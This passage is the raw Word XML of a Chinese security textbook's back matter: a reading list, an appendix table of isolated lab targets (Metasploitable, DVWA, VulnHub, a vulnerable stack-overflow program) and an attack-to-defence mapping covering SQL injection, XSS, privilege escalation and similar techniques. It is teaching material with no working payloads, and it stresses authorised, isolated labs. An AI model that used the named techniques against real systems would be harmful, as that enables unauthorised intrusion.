        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全领域的经典参考，对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi、XSS、CSRF、逻辑漏洞有深入的技术分析。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Richard </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Bejtlich，《The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Practice of Network Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring》（No</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Starch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Press）：NSM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">理念奠基之作，与本书卷五的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS/IPS、SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和检测工程形成互补。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方知识库（attack.mitre.org）：威胁映射、检测差距分析与防御评估的标准框架，蓝队检测工程的核心资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NIST SP 800 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系列（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 800-53, 800-61, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">800-115）：美国国家标准与技术研究院的安全控制、应急响应和技术测试指南，是建立安全基线的权威文档。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Benchmarks（Center</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for Internet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Security）：针对各类操作系统、云平台和网络设备的安全配置基线，是主机加固的直接操作依据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">馆藏《从位到物联》：本书的体系基石，涵盖数字逻辑、计算机组成、操作系统、网络协议、密码学与物联网，为所有攻防操作提供“为什么能工作”的底层解释。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上述书单与标准共同构成读者从本书出发、迈向更高阶安全实践的可靠路径，且所有推荐均属公开合法获取的学术或工业参考，与本书一样恪守授权与伦理边界。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="403"/>
    <w:bookmarkEnd w:id="404"/>
    <w:bookmarkEnd w:id="405"/>
    <w:bookmarkStart w:id="411" w:name="附录"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附录</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="406" w:name="附录-a-全书靶机与搭建清单实操底座索引"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">全书靶机与搭建清单（实操底座索引）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靶机</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">用途</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">搭建出处</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">VirtualBox/VMware + host-only </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">隔离网络</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">实验室骨架（与生产/公网隔离）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">攻击机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Metasploitable2/3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">扫描</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / Metasploit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">全链路靶机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 2、5、17 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DVWA / SQLi-labs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">漏洞逐关（注入/XSS/上传/盲注）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 2、9、10、11 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">VulnHub </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">镜像</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">提权</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / capstone </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">多漏洞靶机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 2、15、22 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">自编译教学漏洞程序（关闭缓解）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">栈溢出最小示例（仅授权</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> CTF </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">教学）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 14 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">自有哈希样本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">哈希破解（John/Hashcat）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 13 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">监控环境（Snort/Suricata</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">规则）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">蓝队检测工程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">第</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 19 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所有靶机一律在隔离实验室或官方授权环境部署；实操前存快照，破坏性操作可回滚。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="406"/>
    <w:bookmarkStart w:id="407" w:name="附录-b-攻防对称速查攻击-防御映射"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> B · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防对称速查（攻击</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御映射）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攻击技术</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">配套防御（蓝队检测</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">修复）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">章</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">端口扫描（Nmap</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">SYN/UDP）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IDS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">扫描特征、限速、SYN</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">cookie、默认拒绝</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5 / 19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">欺骗</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / MITM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">动态</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">检测（DAI）、DHCP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Snooping、端到端加密</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">参数化查询/预编译（根治）、最小权限、DB</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">审计</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">XSS / CSRF / SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">输出编码、CSP、Anti-CSRF</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Token、出站白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">弱口令爆破</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / LFI / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">速率限制+MFA、路径规范化、上传白名单+禁执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">哈希破解</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">慢哈希</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">KDF（bcrypt/argon2）+</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">唯一盐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">栈溢出</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">NX/Canary/ASLR/PIE、安全编码、内存安全语言</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Linux/Windows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">提权</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">最小权限、移除危险</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">SUID/服务配置、补丁</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">15 / 16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
